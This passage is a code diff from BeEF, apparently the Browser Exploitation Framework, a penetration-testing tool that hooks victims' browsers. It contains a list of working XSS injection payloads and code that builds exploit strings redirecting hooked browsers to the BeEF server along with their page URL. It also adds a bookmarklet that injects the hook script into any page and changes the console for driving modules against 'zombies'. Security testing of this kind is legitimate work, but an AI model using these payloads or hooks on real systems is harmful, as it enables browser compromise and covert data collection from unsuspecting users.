+				  {input:'\'\"<\/script><\/xml><\/title><\/textarea><\/noscript><\/style><\/listing><\/xmp><\/pre><img src=null onerror=XSS>', name: 'Image injection HTML breaker', browser: 'ALL',url:true,form:true,path:true},
+				  {input:"'},XSS,function x(){//", name: 'DOM based function breaker single quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'"},XSS,function x(){//', name: 'DOM based function breaker double quote', browser: 'ALL',url:true,form:true,path:true},
 				  {input:'\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3eXSS\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e', name: 'DOM based innerHTML injection', browser: 'ALL',url:true,form:true,path:true},
   				  {input:'javascript:XSS', name: 'Javascript protocol injection', browser: 'ALL',url:true,form:true,path:true},
@@ -107,7 +105,7 @@ beef.net.xssrays = {
     // util function. Print string to the console only if the debug flag is on and the browser is not IE.
     printDebug:function(log) {
         if (this.debug && (!beef.browser.isIE6() && !beef.browser.isIE7() && !beef.browser.isIE8())) {
-            console.log("[XssRays] " + log);
+            beef.debug("[XssRays] " + log);
         }
     },
 
@@ -340,8 +338,8 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -368,7 +366,7 @@ beef.net.xssrays = {
                 beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                 beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                    + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                    + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                 exploit = vector.input.replace(/XSS/g, beefCallback);
 
@@ -424,7 +422,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
                         beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
-                            + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
+                            + "&action=ray" + "&p='+window.location.href+'&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = beef.net.xssrays.escape(vector.input.replace(/XSS/g, beefCallback));
                         form += '<textarea name="' + i + '">' + exploit + '<\/textarea>';

core/main/client/session.js

@@ -13,7 +13,8 @@ beef.session = {
 	
 	hook_session_id_length: 80,
 	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	
-	ec: new evercookie(),	
+	ec: new evercookie(),
+    beefhook: "<%= @hook_session_name %>",
 	
 	/**
 	 * Gets a string which will be used to identify the hooked browser session
@@ -22,12 +23,12 @@ beef.session = {
 	 */
   	get_hook_session_id: function() {
 		// check if the browser is already known to the framework
-		var id = this.ec.evercookie_cookie("BEEFHOOK");
+		var id = this.ec.evercookie_cookie(beef.session.beefhook);
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_userdata("BEEFHOOK");
+			var id = this.ec.evercookie_userdata(beef.session.beefhook);
 		}
 		if (typeof id == 'undefined') {
-			var id = this.ec.evercookie_window("BEEFHOOK");
+			var id = this.ec.evercookie_window(beef.session.beefhook);
 		}
 		
 		// if the browser is not known create a hook session id and set it
@@ -47,9 +48,9 @@ beef.session = {
 	 */
   	set_hook_session_id: function(id) {
 		// persist the hook session id
-		this.ec.evercookie_cookie("BEEFHOOK", id);
-		this.ec.evercookie_userdata("BEEFHOOK", id);
-		this.ec.evercookie_window("BEEFHOOK", id);
+		this.ec.evercookie_cookie(beef.session.beefhook, id);
+		this.ec.evercookie_userdata(beef.session.beefhook, id);
+		this.ec.evercookie_window(beef.session.beefhook, id);
 	},
 	
 	/**

core/main/client/updater.js

@@ -15,6 +15,7 @@ beef.updater = {
 	
 	// XHR-polling timeout.
     xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
+    beefhook: "<%= @hook_session_name %>",
 	
 	// A lock.
 	lock: false,
@@ -57,7 +58,7 @@ beef.updater = {
 	get_commands: function() {
 		try {
 			this.lock = true;
-            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
+            beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, beef.updater.beefhook+'='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
                 if (response.body != null && response.body.length > 0)
                     beef.updater.execute_commands();
             });

core/main/handlers/browserdetails.rb

@@ -255,6 +255,14 @@ module BeEF
             self.err_msg "Invalid value for HasWebSocket returned from the hook browser's initial connection."
           end
 
+          # get and store the yes|no value for HasWebRTC
+          has_webrtc = get_param(@data['results'], 'HasWebRTC')
+          if BeEF::Filters.is_valid_yes_no?(has_webrtc)
+            BD.set(session_id, 'HasWebRTC', has_webrtc)
+          else
+            self.err_msg "Invalid value for HasWebRTC returned from the hook browser's initial connection."
+          end
+
           # get and store the yes|no value for HasActiveX
           has_activex = get_param(@data['results'], 'HasActiveX')
           if BeEF::Filters.is_valid_yes_no?(has_activex)

core/main/handlers/hookedbrowsers.rb

@@ -51,13 +51,18 @@ module Handlers
 
       # @note is a known browser so send instructions 
       else       
+        # @note Check if we haven't seen this browser for a while, log an event if we haven't
+        if (Time.new.to_i - hooked_browser.lastseen.to_i) > 60
+          BeEF::Core::Logger.instance.register('Zombie',"#{hooked_browser.ip} appears to have come back online","#{hooked_browser.id}")
+        end
+
         # @note record the last poll from the browser
         hooked_browser.lastseen = Time.new.to_i
         
         # @note Check for a change in zombie IP and log an event
         if config.get('beef.http.use_x_forward_for') == true
           if hooked_browser.ip != request.env["HTTP_X_FORWARDED_FOR"]
-            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}")
+            BeEF::Core::Logger.instance.register('Zombie',"IP address has changed from #{hooked_browser.ip} to #{request.env["HTTP_X_FORWARDED_FOR"]}","#{hooked_browser.id}")
             hooked_browser.ip = request.env["HTTP_X_FORWARDED_FOR"]
           end
         else

core/main/handlers/modules/beefjs.rb

@@ -80,8 +80,9 @@ module BeEF
             # @note set the XHR-polling timeout
             hook_session_config['xhr_poll_timeout'] = config.get("beef.http.xhr_poll_timeout")
 
-            # @note set the hook file path
+            # @note set the hook file path and BeEF's cookie name
             hook_session_config['hook_file'] = config.get("beef.http.hook_file")
+            hook_session_config['hook_session_name'] = config.get("beef.http.hook_session_name")
 
             # @note if http_port <> public_port in config ini, use the public_port
             unless hook_session_config['beef_public_port'].nil?

core/main/router/router.rb

@@ -81,16 +81,34 @@ module BeEF
             case type
               when "apache"
                 headers "Server" => "Apache/2.2.3 (CentOS)",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
 
               when "iis"
                 headers "Server" => "Microsoft-IIS/6.0",
                         "X-Powered-By" => "ASP.NET",
-                        "Content-Type" => "text/html"
+                        "Content-Type" => "text/html; charset=UTF-8"
               else
                 print_error "You have and error in beef.http.web_server_imitation.type! Supported values are: apache, iis."
             end
           end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          # this apparently duplicate code is needed to reply to preflight OPTIONS requests, which need to respond with a 200
+          # and be able to handle requests with a JSON content-type
+          if request.request_method == 'OPTIONS' && config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET",
+                    "Access-Control-Allow-Headers" => "Content-Type"
+            halt 200
+          end
+
+          # @note If CORS are enabled, expose the appropriate headers
+          if config.get("beef.http.restful_api.allow_cors")
+            allowed_domains = config.get("beef.http.restful_api.cors_allowed_domains")
+            headers "Access-Control-Allow-Origin" => allowed_domains,
+                    "Access-Control-Allow-Methods" => "POST, GET"
+          end
         end
 
         # @note Default root page

core/main/server.rb

@@ -34,16 +34,18 @@ module BeEF
 
       def to_h
         {
-            'beef_version' => VERSION,
-            'beef_url' => @url,
+            'beef_version'  => VERSION,
+            'beef_url'      => @url,
             'beef_root_dir' => @root_dir,
-            'beef_host' => @configuration.get('beef.http.host'),
-            'beef_port' => @configuration.get('beef.http.port'),
-            'beef_public' => @configuration.get('beef.http.public'),
+            'beef_host'     => @configuration.get('beef.http.host'),
+            'beef_port'     => @configuration.get('beef.http.port'),
+            'beef_public'   => @configuration.get('beef.http.public'),
             'beef_public_port' => @configuration.get('beef.http.public_port'),
-            'beef_dns' => @configuration.get('beef.http.dns'),
-            'beef_hook' => @configuration.get('beef.http.hook_file'),
-            'beef_proto' => @configuration.get('beef.http.https.enable') == true ? "https" : "http"
+            'beef_dns_host' => @configuration.get('beef.http.dns_host'),
+            'beef_dns_port' => @configuration.get('beef.http.dns_port'),
+            'beef_hook'     => @configuration.get('beef.http.hook_file'),
+            'beef_proto'    => @configuration.get('beef.http.https.enable') == true ? "https" : "http",
+            'client_debug'  => @configuration.get("beef.client.debug")
         }
       end
 

extensions/admin_ui/controllers/modules/modules.rb

@@ -86,6 +86,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         ['Browser Components', 'Windows Media Player','HasWMP'],
         ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'Foxit Reader',       'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],

extensions/admin_ui/controllers/panel/index.html

@@ -60,6 +60,8 @@
 <body>
 	<%= nonce_tag %>	
 	<div id="header">
+		<div class="left-menu" id="header-right">
+		</div>
 		<div class="right-menu">
 			<img src="/ui/media/images/favicon.ico" alt="BeEF" title="BeEF" /> 
 			BeEF <%= BeEF::Core::Configuration.instance.get('beef.version') %> | 

extensions/admin_ui/controllers/panel/panel.rb

@@ -88,6 +88,7 @@ module BeEF
             has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
             has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
             has_java        = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
+            has_webrtc      = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
             has_activex     = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
             has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
             has_quicktime   = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
@@ -113,6 +114,7 @@ module BeEF
                 'has_web_sockets' => has_web_sockets,
                 'has_googlegears' => has_googlegears,
                 'has_java'        => has_java,
+                'has_webrtc'      => has_webrtc,
                 'has_activex'     => has_activex,
                 'has_silverlight' => has_silverlight,
                 'has_quicktime'   => has_quicktime,

extensions/admin_ui/media/css/base.css

@@ -5,13 +5,24 @@
  */
 
 #header .right-menu {
+	width: 300px;
 	float: right;
-	margin: 10px;
+	margin: 3px 3px 0 4px;
 	word-spacing: 5px;
 	font: 11px arial, tahoma, verdana, helvetica;
 	color:#000;
 }
 
+#header .left-menu {
+	width: 300px;
+	float: left;
+	margin: 10px 4px 0 20px;
+	word-spacing: 5px;
+	font: 11px arial, tahoma, verdana, helvetica;
+	font-weight: bolder;
+	color:red;
+}
+
 #header a:link,
 #header a:visited {
 	color:#000;

extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js

@@ -42,19 +42,39 @@ Ext.onReady(function() {
  * This event updater retrieves updates every 8 seconds. Those updates
  * are then pushed to various managers (i.e. the zombie manager).
  */
+var lastpoll = new Date().getTime();
+
 Ext.TaskMgr.start({
 	run: function() {
 		Ext.Ajax.request({
 			url: '/ui/panel/hooked-browser-tree-update.json',
 			method: 'POST',
 			success: function(response) {
-				var updates = Ext.util.JSON.decode(response.responseText);
+				var updates;
+				try {
+					updates = Ext.util.JSON.decode(response.responseText);
+				} catch (e) {
+					//The framework has probably been reset and you're actually logged out
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
+				}
 				var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
 				var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;
 				
 				if(zombiesManager && hooked_browsers) {
 					zombiesManager.updateZombies(hooked_browsers, distributed_engine_rules);
 				}
+				lastpoll = new Date().getTime();
+				var hr = document.getElementById("header-right");
+				hr.innerHTML = "";
+			},
+			failure: function(response) {
+				var timenow = new Date().getTime();
+
+				if ((timenow - lastpoll) > 60000) {
+					var hr = document.getElementById("header-right");
+					hr.innerHTML = "Framework is down";
+				}
 			}
 		});
 	},

extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js

@@ -6,6 +6,10 @@
 
 WelcomeTab = function() {
 
+    var hookURL = location.protocol+'%2f%2f'+location.hostname+(location.port ? ':'+location.port : '')+'%2fhook.js';
+    var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27__HOOKURL__%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
+    bookmarklet = bookmarklet.replace(/__HOOKURL__/,hookURL);
+
     welcome = " \
               <div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
               <p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
@@ -13,6 +17,7 @@ WelcomeTab = function() {
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
               <p>Welcome to BeEF!</p><br /> \
               <p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
+              <p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
               <p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
               <p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
               <p>To interact with a hooked browser simply left-click it, a new tab will appear. \
@@ -46,7 +51,9 @@ WelcomeTab = function() {
               </div>\
               ";
 
-    WelcomeTab.superclass.constructor.call(this, {
+  welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
+
+  WelcomeTab.superclass.constructor.call(this, {
 	region:'center',
 	padding:'10 10 10 10',
 	html: welcome,

extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js

@@ -27,10 +27,11 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		var has_web_sockets    = zombie_array[index]["has_web_sockets"];
 		var has_googlegears    = zombie_array[index]["has_googlegears"];
 		var has_java           = zombie_array[index]["has_java"];
+		var has_webrtc         = zombie_array[index]["has_webrtc"];
 		var has_activex        = zombie_array[index]["has_activex"];
-        var has_wmp            = zombie_array[index]["has_wmp"]; 
+		var has_wmp            = zombie_array[index]["has_wmp"]; 
 		var has_vlc            = zombie_array[index]["has_vlc"];
-        var has_foxit          = zombie_array[index]["has_foxit"];
+		var has_foxit          = zombie_array[index]["has_foxit"];
 		var has_silverlight    = zombie_array[index]["has_silverlight"];
 		var has_quicktime      = zombie_array[index]["has_quicktime"];
 		var has_realplayer     = zombie_array[index]["has_realplayer"];
@@ -47,14 +48,15 @@ var ZombiesMgr = function(zombies_tree_lists) {
 		balloon_text+= "<br/>Hardware: "       + hw_name;
 		balloon_text+= "<br/>Domain: "         + domain + ":" + port;
 		balloon_text+= "<br/>Flash: "          + has_flash;
-        balloon_text+= "<br/>Java: "           + has_java;
-        balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>Java: "           + has_java;
+		balloon_text+= "<br/>Web Sockets: "    + has_web_sockets;
+		balloon_text+= "<br/>WebRTC: "         + has_webrtc;
 		balloon_text+= "<br/>ActiveX: "        + has_activex;
 		balloon_text+= "<br/>Silverlight: "    + has_silverlight;
 		balloon_text+= "<br/>QuickTime: "      + has_quicktime;
-        balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
-        balloon_text+= "<br/>VLC: "            + has_vlc;
-        balloon_text+= "<br/>Foxit: "          + has_foxit;
+		balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp; 
+		balloon_text+= "<br/>VLC: "            + has_vlc;
+		balloon_text+= "<br/>Foxit: "          + has_foxit;
 		balloon_text+= "<br/>RealPlayer: "     + has_realplayer;
 		balloon_text+= "<br/>Google Gears: "   + has_googlegears;
 		balloon_text+= "<br/>Date: "           + date_stamp;
@@ -67,7 +69,7 @@ var ZombiesMgr = function(zombies_tree_lists) {
 			'balloon_text' : balloon_text,
 			'check'        : false,
 			'domain'       : domain,
-            'port'         : port
+			'port'         : port
 		};
 
 		return new_zombie;

extensions/admin_ui/media/javascript/ui/panel/common.js

@@ -249,12 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
 							html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
 							html += '<p>';
 							for(index in record.data.data) {
-								result = record.data.data[index];
+								result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
 								index = index.toString().replace('_', ' ');
-                                //output escape everything, but allow the <br> tag for better rendering.
-								html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
+								// Check if the data is the image parameter and that it's a base64 encoded png.
+								if (result.substring(0,28) == "image=data:image/png;base64,") {
+									// Lets display the image
+									try {
+										base64_data = window.atob(result.substring(29,result.length));
+										html += String.format('<img src="{0}" /><br>', result.substring(6));
+									} catch(e) {
+										beef.debug("Received invalid base64 encoded image string: "+e.toString());
+										html += String.format('<b>{0}</b>: {1}<br>', index, result);
+									}
+								} else {
+									// output escape everything, but allow the <br> tag for better rendering.
+									html += String.format('<b>{0}</b>: {1}<br>', index, result);
+								}
 							}
-							
+
 							html += '</p>';
 							return html;
 						}

extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabIpec.js

@@ -33,7 +33,7 @@ ZombieTab_IpecTab = function(zombie) {
                 id = data.id;
             },
             error: function(){
-                console.log("Error getting module id.");
+                beef.debug("Error getting module id.");
             }
         });
         return id;
@@ -110,11 +110,11 @@ ZombieTab_IpecTab = function(zombie) {
                     async: false,
                     processData: false,
                     success: function(data){
-                        console.log("data: " + data.command_id);
+                        beef.debug("data: " + data.command_id);
                         result = "Command [" + data.command_id + "] sent successfully";
                     },
                     error: function(){
-                        console.log("Error sending command");
+                        beef.debug("Error sending command");
                         return "Error sending command";
                     }
                 });
@@ -142,13 +142,13 @@ ZombieTab_IpecTab = function(zombie) {
                         processData: false,
                         success: function(data){
                             $jwterm.each(data, function(i){
-                                console.log("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
+                                beef.debug("result [" + i +"]: " + $jwterm.parseJSON(data[i].data).data);
                                 results += $jwterm.parseJSON(data[i].data).data;
                             });
 
                         },
                         error: function(){
-                            console.log("Error sending command");
+                            beef.debug("Error sending command");
                             return "Error sending command";
                         }
                     });

extensions/console/lib/command_dispatcher/command.rb

@@ -10,9 +10,18 @@ module CommandDispatcher
   
 class Command
   include BeEF::Extension::Console::CommandDispatcher
+
+  @@params = []
   
   def initialize(driver)
     super
+    begin 
+      driver.interface.cmd['Data'].each{|data|
+        @@params << data['name']
+      }
+    rescue
+      return
+    end
   end
   
   def commands
@@ -41,12 +50,16 @@ class Command
     }
       
     print_line("Module name: " + driver.interface.cmd['Name'])
-    print_line("Module category: " + driver.interface.cmd['Category'])
+    print_line("Module category: " + driver.interface.cmd['Category'].to_s)
     print_line("Module description: " + driver.interface.cmd['Description'])
     print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
 
     driver.interface.cmd['Data'].each{|data|
-      print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      if data['type'].eql?("combobox")
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'] + " (Options include: " + data['store_data'].to_s + ")")
+      else
+        print_line(data['name'] + " => \"" + data['value'].to_s + "\" # " + data['ui_label'])
+      end
     } if not driver.interface.cmd['Data'].nil?
   end
   
@@ -80,6 +93,16 @@ class Command
     print_status("Sets parameters for the current modules. Run \"cmdinfo\" to see the parameter values")
     print_status("  Usage: param <paramname> <paramvalue>")
   end
+
+  def cmd_param_tabs(str,words)
+    return if words.length > 1
+
+    if @@params == ""
+      #nothing prepopulated?
+    else
+      return @@params
+    end
+  end
   
   def cmd_execute(*args)
     @@bare_opts.parse(args) {|opt, idx, val|
@@ -119,6 +142,7 @@ class Command
         ])
 
     if args[0] == nil
+      lastcmdid = nil
       driver.interface.getcommandresponses.each do |resp|
         indiresp = driver.interface.getindividualresponse(resp['object_id'])
         respout = ""
@@ -126,6 +150,7 @@ class Command
           respout = "No response yet"
         else
           respout = Time.at(indiresp[0]['date'].to_i).to_s
+          lastcmdid = resp['object_id']
         end
         tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
       end
@@ -133,6 +158,16 @@ class Command
       puts "\n"
       puts "List of responses for this command module:\n"
       puts tbl.to_s + "\n"
+
+      if not lastcmdid.nil?
+        resp = driver.interface.getindividualresponse(lastcmdid)
+        puts "\n"
+        print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
+        print_line("Response:")
+        resp.each do |op|
+          print_line(op['data']['data'].to_s)
+        end
+      end
     else
       output = driver.interface.getindividualresponse(args[0])
       if output.nil?

extensions/console/lib/command_dispatcher/core.rb

@@ -141,13 +141,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
           'OS',
           'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -174,12 +175,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
-          'OS'
+          'OS',
+          'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -283,12 +286,21 @@ class Core
       offlinezombies << zombie.id
     end
     
-    if not offlinezombies.include?(args[0].to_i)
-      print_status("Browser does not appear to be offline..")
-      return false
-    end
+    targets = args[0].split(',')
+    targets.each {|t|
+        if not offlinezombies.include?(t.to_i)
+          print_status("Browser [id:"+t.to_s+"] does not appear to be offline.")
+          return false
+        end
+    #print_status("Adding browser [id:"+t.to_s+"] to target list.")
+    }
+
+    # if not offlinezombies.include?(args[0].to_i)
+    #   print_status("Browser does not appear to be offline..")
+    #   return false
+    # end
     
-    if not driver.interface.setofflinetarget(args[0]).nil?
+    if not driver.interface.setofflinetarget(targets).nil?
       if (driver.dispatcher_stack.size > 1 and
 	      driver.current_dispatcher.name != 'Core')
 	      driver.destack_dispatcher
@@ -299,7 +311,7 @@ class Core
       if driver.interface.targetid.length > 1
         driver.update_prompt("(%bld%redMultiple%clr) ["+driver.interface.targetid.join(",")+"] ")
       else
-        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.to_s+"] ")
+        driver.update_prompt("(%bld%red"+driver.interface.targetip+"%clr) ["+driver.interface.targetid.first.to_s+"] ")
       end
     end  
     
@@ -327,7 +339,12 @@ class Core
         driver.run_single("offline")
       when 'commands'
         if driver.dispatched_enstacked(Target)
+          if args[1] == "-s" and not args[2].nil?
+           driver.run_single("commands #{args[1]} #{args[2]}")
+           return
+         else
           driver.run_single("commands")
+        end
         else
           print_error("You aren't targeting a zombie yet")
         end

extensions/console/lib/command_dispatcher/target.rb

@@ -18,7 +18,7 @@ class Target
     begin
       driver.interface.getcommands.each { |folder|
         folder['children'].each { |command|
-          @@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          @@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
         }
       }
     rescue
@@ -40,17 +40,29 @@ class Target
   
   @@bare_opts = Rex::Parser::Arguments.new(
 	  "-h" => [ false, "Help."              ])
+
+  @@commands_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help."],
+    "-s" => [ false, "<search term>"],
+    "-r" => [ false, "List modules which have responses against them only"])
   
   def cmd_commands(*args)
+
+    searchstring = nil
+    responly = nil
     
-    @@bare_opts.parse(args) {|opt, idx, val|
+    @@commands_opts.parse(args) {|opt, idx, val|
       case opt
         when "-h"
           cmd_commands_help
           return false
+        when "-s"
+          searchstring = args[1].downcase if not args[1].nil?
+        when "-r"
+          responly = true
         end
     }
-    
+
     tbl = Rex::Ui::Text::Table.new(
       'Columns' =>
         [
@@ -63,10 +75,29 @@ class Target
     
     driver.interface.getcommands.each { |folder|
       folder['children'].each { |command|
-        tbl << [command['id'].to_i,
-                folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
+
+        cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+
+        if not searchstring.nil?
+          if not cmdstring.downcase.index(searchstring).nil?
+            tbl << [command['id'].to_i,
+                cmdstring,
                 command['status'].gsub(/^Verified /,""),
                 driver.interface.getcommandresponses(command['id']).length] #TODO
+          end
+        elsif not responly.nil?
+             tbl << [command['id'].to_i,
+                cmdstring,
+                command['status'].gsub(/^Verified /,""),
+                driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
+
+        else 
+         tbl << [command['id'].to_i,
+            cmdstring,
+            command['status'].gsub(/^Verified /,""),
+            driver.interface.getcommandresponses(command['id']).length] #TODO
+        end
+
       }
     }
     
@@ -78,6 +109,9 @@ class Target
   
   def cmd_commands_help(*args)
     print_status("List command modules for this target")
+    print_line("Usage: commands [options]")
+    print_line
+    print @@commands_opts.usage()
   end
   
   def cmd_info(*args)
@@ -133,7 +167,7 @@ class Target
     else
       driver.interface.getcommands.each { |x|
         x['children'].each { |y|
-          if args[0].chomp == x['text']+"/"+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          if args[0].chomp == x['text'].gsub(/\s/,"_")+y['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
             modid = y['id']
           end
         }

extensions/console/lib/shellinterface.rb

@@ -302,6 +302,7 @@ class ShellInterface
         ['Browser Components', 'Windows Media Player','HasWMP'], 
         ['Browser Components', 'VLC',                'HasVLC'],
         ['Browser Components', 'Foxit',              'HasFoxit'],
+        ['Browser Components', 'WebRTC',             'HasWebRTC'],
         ['Browser Components', 'ActiveX',            'HasActiveX'],
         ['Browser Components', 'Session Cookies',    'hasSessionCookies'],
         ['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
@@ -310,7 +311,7 @@ class ShellInterface
         ['Hooked Page', 'Page Title',    'PageTitle'],
